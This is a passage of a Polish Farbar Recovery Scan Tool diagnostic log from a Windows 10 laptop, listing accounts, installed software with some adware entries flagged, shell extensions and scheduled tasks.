Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 14.03.2018 Uruchomiony przez acer (27-03-2018 00:06:30) Uruchomiony z C:\Users\acer.LAPTOP-5ILJ21CV.000\Downloads Windows 10 Home Wersja 1709 16299.309 (X64) (2018-01-05 22:16:01) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= acer (S-1-5-21-3582310716-3901469781-3033083607-1008 - Administrator - Enabled) => C:\Users\acer.LAPTOP-5ILJ21CV.000 Administrator (S-1-5-21-3582310716-3901469781-3033083607-500 - Administrator - Disabled) Gość (S-1-5-21-3582310716-3901469781-3033083607-501 - Limited - Disabled) Konto domyślne (S-1-5-21-3582310716-3901469781-3033083607-503 - Limited - Disabled) WDAGUtilityAccount (S-1-5-21-3582310716-3901469781-3033083607-504 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 12 Labours of Hercules III: Girl Power (HKLM-x32\...\WTA-4514665d-2590-4ec9-afaf-83bc62e66ff2) (Version: 3.0.2.118 - WildTangent) Hidden 2018 SuperPłace (HKLM-x32\...\2001SuperPlace) (Version: - ) abFiles (HKLM-x32\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 2.07.2004 - Acer Incorporated) abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 3.08.2003.3 - Acer Incorporated) Acer Care Center (HKLM\...\{1AF41E84-3408-499A-8C93-8891F0612719}) (Version: 2.00.3024 - Acer Incorporated) Acer Configuration Manager (HKLM-x32\...\{414D554E-4453-454E-0201-000000016258}) (Version: 2.1.16258 - Acer) Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 3.12.2004 - Acer Incorporated) Acer Quick Access (HKLM\...\{8BBF04F1-C68A-441C-B5EF-446EE9960EAF}) (Version: 2.01.3007 - Acer Incorporated) Acer UEIP Framework (HKLM\...\{12A718F2-2357-4D41-9E1F-18583A4745F7}) (Version: 3.02.3001 - Acer Incorporated) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 29.0.0.112 - Adobe Systems Incorporated) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.3.0.256 - Adobe Systems Incorporated) Adobe Photoshop CC 2018 (HKLM-x32\...\PHSP_19_0_1) (Version: 19.0.1 - Adobe Systems Incorporated) Amazon Assistant (HKLM-x32\...\{0538B1C2-85C1-4ECC-BA77-61F537D81092}) (Version: 10.18.0221 - Amazon) <==== UWAGA Amazon Search (HKLM-x32\...\Amazon Assistant) (Version: 2.3.4 - Amazon) AOP Framework (HKLM-x32\...\{4A37A114-702F-4055-A4B6-16571D4A5353}) (Version: 3.22.2001.0 - Acer Incorporated) App Explorer (HKU\S-1-5-21-3582310716-3901469781-3033083607-1008\...\Host App Service) (Version: 0.273.2.646 - SweetLabs) <==== UWAGA Apple Application Support (32-bit) (HKLM-x32\...\{D079CAAD-0C31-47A2-9AF5-A82F9CD9B221}) (Version: 5.2 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{64E6007B-1DA9-42CD-BBE4-D5FA67A7C71D}) (Version: 5.2 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.) Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.) AVS Video Editor 7.5.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.5.1.288 - Online Media Technologies Ltd.) Badanie mające na celu poprawę produktów HP Deskjet 1510 series (HKLM\...\{201842BD-6AB0-422A-9A01-DD1DA9BC03B9}) (Version: 32.2.188.47710 - Hewlett-Packard Co.) Badanie mające na celu poprawę produktów HP DeskJet 2130 series (HKLM\...\{B9FFC47E-EED3-40B3-AD48-7149F70DD07D}) (Version: 40.11.1124.17107 - HP Inc.) Bandicam (HKLM-x32\...\Bandicam) (Version: 4.0.1.1339 - Bandicam.com) Bandicam MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandicam.com) Bloody6 (HKLM-x32\...\Bloody3) (Version: 17.04.0003 - Bloody) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) Booking (HKLM-x32\...\{13D4CD54-EA09-4FDB-B979-8B2BC0F020CA}_is1) (Version: 2.0.701 - Booking) Booking.com Weblink (HKLM-x32\...\{617FC0E5-23D3-437D-9D19-6754E8287A79}) (Version: 1.16.0726 - Acer) ByteFence Anti-Malware (HKLM-x32\...\ByteFence) (Version: 3.14.0.10 - Byte Technologies LLC) <==== UWAGA CCleaner (HKLM\...\CCleaner) (Version: 5.37 - Piriform) CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.5917.02 - CyberLink Corp.) Dashlane Upgrade Service (HKLM-x32\...\Dashlane Upgrade Service) (Version: 2.1.17.0 - Dashlane, Inc.) Discord (HKU\S-1-5-21-3582310716-3901469781-3033083607-1008\...\Discord) (Version: 0.0.300 - Discord Inc.) DriverDoc (HKLM-x32\...\{4D0A0750-B034-4DF8-97DE-26F1212AC2FF}) (Version: 1.3.2 - Solvusoft Corporation) Hidden DriverDoc (HKLM-x32\...\DriverDoc) (Version: 1.3.2 - Solvusoft Corporation) DriverSetupUtility (HKLM\...\{2B51C83A-465D-4EA9-9CDC-1ED95ED09AC6}) (Version: 1.00.3011 - Acer Incorporated) DRUKI Gofin 3.2.8.0 (HKLM-x32\...\{ce1f6de9-8f85-4d04-9707-d53d21f13e9e}) (Version: 3.2.8.0 - Wydawnictwo Podatkowe GOFIN sp. z o.o.) DRUKI Gofin 3.3.9.0 (HKLM-x32\...\{2EC9D42F-DC78-44B8-845C-0CF911495774}) (Version: 3.3.9.0 - Wydawnictwo Podatkowe GOFIN sp. z o.o.) eBay Weblink (HKLM-x32\...\{7F3596EF-B661-43EE-A321-AD3C3EB9B525}) (Version: 1.16.0726 - Acer) e-Deklaracje Desktop (HKLM-x32\...\{DF37F034-1762-10B8-4727-A1F5CB72E7AB}) (Version: 10.0.1 - Ministerstwo Finansow) Hidden e-Deklaracje Desktop (HKLM-x32\...\e-Deklaracje.A1909296681C7ACEFE45687D3A64758C8659BF46.1) (Version: 10.0.1 - Ministerstwo Finansow) Facebook Gameroom 1.20.6618.42311 (HKLM-x32\...\{CF2C7CB9-1009-4EAA-9033-317F4C4C9DA2}) (Version: 1.20.6618.42311 - Facebook) FileZilla Client 3.31.0 (HKU\S-1-5-21-3582310716-3901469781-3033083607-1008\...\FileZilla Client) (Version: 3.31.0 - Tim Kosse) Fraps (HKLM-x32\...\Fraps) (Version: - ) Freemake Video Converter wersja 4.1.9 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.9 - Ellora Assets Corporation) Game Explorer Categories - genres (HKLM-x32\...\WildTangentGameProvider-acer-genres) (Version: 13.0.0.6 - WildTangent, Inc.) Game Explorer Categories - main (HKLM-x32\...\WildTangentGameProvider-acer-main) (Version: 13.0.0.6 - WildTangent, Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.) Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden GTA San Andreas (HKLM-x32\...\GTA San Andreas) (Version: - ) Home Makeover (HKLM-x32\...\WTA-45b7d0c5-3b0c-4f94-8d8b-cb79a13e43d5) (Version: 3.0.2.59 - WildTangent) Hidden HP Deskjet 1510 series — podstawowe oprogramowanie urządzenia (HKLM\...\{021AA127-6B6D-46EF-9697-5089FA686FB6}) (Version: 32.2.188.47710 - Hewlett-Packard Co.) HP Deskjet 1510 series Pomoc (HKLM-x32\...\{065AAC3B-F0A7-4D13-A40B-3133D319E4EB}) (Version: 30.0.0 - Hewlett Packard) HP DeskJet 2130 series — podstawowe oprogramowanie urządzenia (HKLM\...\{A69F1024-5FCE-43BC-A860-427D8418435B}) (Version: 40.11.1124.17107 - HP Inc.) HP DeskJet 2130 series Pomoc (HKLM-x32\...\{EB0F877F-000D-4FCA-81E5-B7689B2CEB77}) (Version: 35.0.0 - Hewlett Packard) HP Dropbox Plugin (HKLM-x32\...\{8A3F1F3A-A88B-4090-83C6-3C4CBDE3F8CC}) (Version: 36.0.41.58587 - HP) HP Google Drive Plugin (HKLM-x32\...\{958F5926-D507-4C87-B83B-8D6CA34195D9}) (Version: 36.0.41.58587 - HP) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) Intel(R) Chipset Device Software (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4703 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation) Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.253.0 - Intel Corporation) Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation) iTunes (HKLM\...\{81C96689-EA5B-4B7D-A04F-16326EC51BC2}) (Version: 12.5.4.42 - Apple Inc.) Java 8 Update 161 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180161F0}) (Version: 8.0.1610.12 - Oracle Corporation) Jewel Match 3 (HKLM-x32\...\WTA-8262ca8d-ea2e-4384-911c-1b850b9107c6) (Version: 2.2.0.97 - WildTangent) Hidden Jewel Match Snowscapes (HKLM-x32\...\WTA-d9687904-2a3d-4434-ba74-597bedfe3ab0) (Version: 3.0.2.118 - WildTangent) Hidden KadryPlace (HKLM-x32\...\KadryPlace) (Version: - ) KeyDominator2 (HKLM-x32\...\BloodyKeyboard) (Version: 17.04.0004 - Bloody) Magic Academy (HKLM-x32\...\WTA-f75aac0f-1adb-406a-8712-f9882ae679a6) (Version: 2.2.0.97 - WildTangent) Hidden MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited) Microsoft Office Professional 2016 - pl-pl (HKLM\...\ProfessionalRetail - pl-pl) (Version: 16.0.9029.2253 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3582310716-3901469781-3033083607-1008\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft WSE 3.0 (HKLM-x32\...\{EDEA8AB7-7683-4ED2-AA19-E6C078064C0D}) (Version: 3.0.5305.0 - Microsoft Corporation) Minecraft Pingwin Pack 3 wersja 3.2 (HKLM-x32\...\{980D9D3E-9724-4480-AFEB-199182CB10B0}_is1) (Version: 3.2 - MrProInformatyk) Minecraft Pingwin Pack 4 - Ultimate wersja 4.1 Ultimate (HKLM-x32\...\{BE6516A2-1364-4769-B038-72FDC159C94A}_is1) (Version: 4.1 Ultimate - AvenisHD) Minecraft Pingwin Pack 5 wersja 5.0 (HKLM-x32\...\{8CB84F44-615F-4B3A-A193-E825D7E3362C}_is1) (Version: 5.0 - AvenisHD) Mozilla Firefox 56.0 (x86 pl) (HKLM-x32\...\Mozilla Firefox 56.0 (x86 pl)) (Version: 56.0 - Mozilla) Mozilla Firefox 58.0.2 (x64 pl) (HKLM\...\Mozilla Firefox 58.0.2 (x64 pl)) (Version: 58.0.2 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 57.0.1 - Mozilla) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.4 - Notepad++ Team) NVIDIA GeForce Experience 2.5.11.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.11.45 - NVIDIA Corporation) NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.9029.2253 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.9029.2253 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.9029.2253 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0415-0000-0000000FF1CE}) (Version: 16.0.9029.2253 - Microsoft Corporation) Hidden OpenVPN 2.4.4-I601 (HKLM\...\OpenVPN) (Version: 2.4.4-I601 - OpenVPN Technologies, Inc.) Panel sterowania NVIDIA 376.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 376.54 - NVIDIA Corporation) Hidden Płatnik 10.01.001 (HKLM-x32\...\{05381030-963D-4779-BECA-0D7D49268EDB}) (Version: 10.01.001 - Asseco Poland S.A.) Polar Bowler 1st Frame (HKLM-x32\...\WTA-175a4c6a-d5cb-4115-8a2c-ba42a7b6a3b7) (Version: 3.0.2.59 - WildTangent) Hidden PrivateTunnel (HKLM-x32\...\PrivateTunnel) (Version: 2.8.4.0 - OpenVPN Technologies) Qualcomm Atheros 11ac Wireless LAN Installer (HKLM-x32\...\{20CA507E-24AA-4741-87CF-CC1B250790B7}) (Version: 11.0.10299 - Qualcomm Atheros) Qualcomm Atheros Bluetooth Installer (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 10.0.0.210 - Qualcomm Atheros) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7553 - Realtek Semiconductor Corp.) Rory's Restaurant (HKLM-x32\...\WTA-3362fbe1-2779-48d5-9823-810b37cbdcfa) (Version: 3.0.2.126 - WildTangent) Hidden Runefall (HKLM-x32\...\WTA-d786b981-0617-4eb8-beba-2b069097c1dc) (Version: 3.0.2.126 - WildTangent) Hidden Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.) ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation) SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 4.1.3000 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 2.5.11.45 - NVIDIA Corporation) Hidden Shotcut (HKLM-x32\...\Shotcut) (Version: - ) Skype™ 7.40 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.40.151 - Skype Technologies S.A.) Spotify Weblink (HKLM-x32\...\{8CADF0CB-E834-4019-9B11-B84E051F2A8E}) (Version: 1.16.1210 - Acer) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - ) TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.0.6447 - TeamViewer) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{DE083343-D24D-4495-919E-18C65EC0F289}) (Version: 2.8.0.0 - Microsoft Corporation) Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version: - WildTangent) Hidden Vegas World (HKLM-x32\...\WildTangentGDF-acer-vegasworld) (Version: 13.0.0.6 - WildTangent) Hidden Vidiot (HKLM-x32\...\Vidiot) (Version: 0.3.19 - Eric Raijmakers) Villagers and Heroes (HKLM-x32\...\WildTangentGDF-acer-villagersandheroes) (Version: 13.0.0.6 - WildTangent) Hidden WarThunder (HKLM-x32\...\WarThunder) (Version: - ) <==== UWAGA WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent) WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-acer) (Version: 4.1.1.12 - WildTangent) Hidden WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-wildgames) (Version: 4.1.1.14 - WildTangent) Hidden Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation) WinRAR 5.40 (32-bitowy) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) WinRAR 5.40 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) WinThruster (HKLM\...\{773A8CA8-3876-4AA1-AB78-EECA231BFF3A}) (Version: 1.26.1 - Solvusoft Corporation) Hidden <==== UWAGA WRF (Płatnik) 1.03.002 (HKLM-x32\...\{460BE803-88CF-4FD2-9082-2450A5959959}) (Version: 1.03.002 - Asseco Poland S.A.) WRFKL 1.02.001 H (HKLM-x32\...\{A98C53C1-D7D5-43FE-82F4-EACD66292004}) (Version: 1.02.001 H - Asseco Poland S.A.) WRFSL 1.02.001 J (HKLM-x32\...\{98A95680-71E0-4C6B-B3D0-384193FCA4F6}) (Version: 1.02.001 J - Asseco Poland S.A.) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-3582310716-3901469781-3033083607-1008_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-EC602988AF8B}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-3582310716-3901469781-3033083607-1008_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems) ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] () ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] () ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] () ShellIconOverlayIdentifiers: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ShellIconOverlayIdentifiers-x32: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers-x32: [ ACloudSyncing] -> {C1E1456F-C2D8-4C96-870D-35F1E13941EE} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ShellIconOverlayIdentifiers-x32: [ ACloudToBeSynced] -> {307523FA-DDC0-4068-983F-2A6B34627744} => C:\Program Files (x86)\Acer\shellext\x64\shellext_win.dll [2016-09-09] (Acer Incorporated) ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] () ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-01-01] () ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\witol\AppData\Local\MEGAsync\ShellExtX64.dll [2017-06-23] () ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-09-25] (Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2016-12-29] (NVIDIA Corporation) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] () ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-09-19] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-09-19] (Alexander Roshal) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {04D79C82-A3F8-4D35-88B4-05C11F7DAF5F} - System32\Tasks\DashlaneUpgradeCheck => net [Argument = start "Dashlane Upgrade Service"] Task: {07822B21-BA6F-44FF-9700-755F1D0FB424} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [2016-07-29] (Acer Incorporated) Task: {0849260B-5C92-49C7-B96C-1B3B25213F75} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18022-0\MpCmdRun.exe [2018-03-01] (Microsoft Corporation) Task: {0A7022EE-DCAA-44B4-8A80-5221B34FCC8E} - System32\Tasks\DistromaticUpdater-periodic => C:\Program Files (x86)\Amazon Browser Settings\updater.exe [2016-12-24] (Distromatic) <==== UWAGA Task: {1241E275-8CFA-4648-B70B-C2D944480919} - System32\Tasks\AdobeGCInvoker-1.0-LAPTOP-5ILJ21CV-acer => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe 